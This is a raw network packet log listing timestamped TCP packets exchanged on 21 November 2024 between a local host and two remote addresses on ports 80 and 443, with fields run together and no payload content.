                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.577224970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.577294111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.577338934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.578290939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.578344107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.578386068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.578429937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.579359055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.579417944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.579483032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.579530954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.580430031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.580485106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.580498934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.580566883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.581512928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.581562996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.581623077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.582092047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.582607985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.582659960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.582737923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.582782030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.583715916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.583789110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.583832979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.583878040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.584788084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.584837914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.584924936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.585064888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.585830927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.585880995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.739662886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.739718914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.739777088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.740170956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.740220070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.740259886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.740299940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.741287947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.741334915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.741354942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.741394997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.742379904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.742438078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.742500067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.742547035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.743452072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.743535042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.743547916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.743591070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.744534969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.744580984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.744643927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.744687080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.745646000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.745671988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.745687962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.745712996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.746761084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.746881008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.746929884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.747812033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.747853994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.747911930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.747956038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.748914003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.748959064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.749041080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.749080896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.750013113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.750070095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.750165939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.750205994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.751060963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.751101971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.751178980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.751223087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.752197027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.752278090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.752285004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.752327919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.753273010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.753318071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.753364086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.753412962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.754333973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.754468918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.754513979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.755439997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.755548000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.755573034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.755599022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.756501913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.756556034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.756602049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.756644964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.757627010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.757678032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.757733107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.757839918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.758718014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.758810043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.758836985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.758882046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.759803057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.759857893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.759928942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.759974957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.760874987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.760921955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.760966063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.761010885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.761981010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.762039900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.762077093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.762125969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.763073921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.763168097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.763211966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.764156103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.764257908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.764301062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.765235901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.765289068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.765337944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.765379906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.766326904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.766379118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.766400099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.766452074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.767417908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.767473936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.767513037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.767554998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.768506050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.768558025 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.768596888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.768641949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.769596100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.769645929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.769726038 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.769834042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.770675898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.770728111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.770837069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.771022081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.771779060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.771894932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.771940947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.772854090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.772906065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.772933960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.773008108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.774022102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.774075985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.774099112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.774137020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.775057077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.775105953 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.775161028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.775207996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.776120901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.776169062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.776216030 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.776285887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.777240038 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.777293921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.777337074 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.777388096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.778356075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.778470993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.778520107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.779396057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.779453993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.779494047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.779540062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.780502081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.780560017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.780596018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.780647993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.781622887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.781672955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.781718016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.781763077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.782687902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.782737017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.782825947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.782870054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.783796072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.783854961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.783880949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.783929110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.784841061 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.784888029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.784895897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.784945011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.785927057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.785976887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.785976887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.786024094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.787053108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.787111044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.787156105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.787199974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.788098097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.788156033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.788244009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.788352013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.789200068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.789261103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.789323092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.789402008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.790291071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.790354967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.790397882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.790441990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.791359901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.791414976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.791481018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.791528940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.792526960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.792589903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.792650938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.792737007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.793600082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.793656111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.793701887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.793883085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.794673920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.794732094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.794770956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.794846058 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.795789957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.795814037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.795840979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.795865059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.796772957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.796833992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.882539988 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.883021116 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.883058071 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.883471966 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.883480072 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.886329889 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.886811972 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.886857986 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.887227058 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.887234926 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.950304985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.950345039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.950381041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.950413942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.950794935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.950882912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.950946093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.951909065 CET804977031.41.244.11192.168.2.4
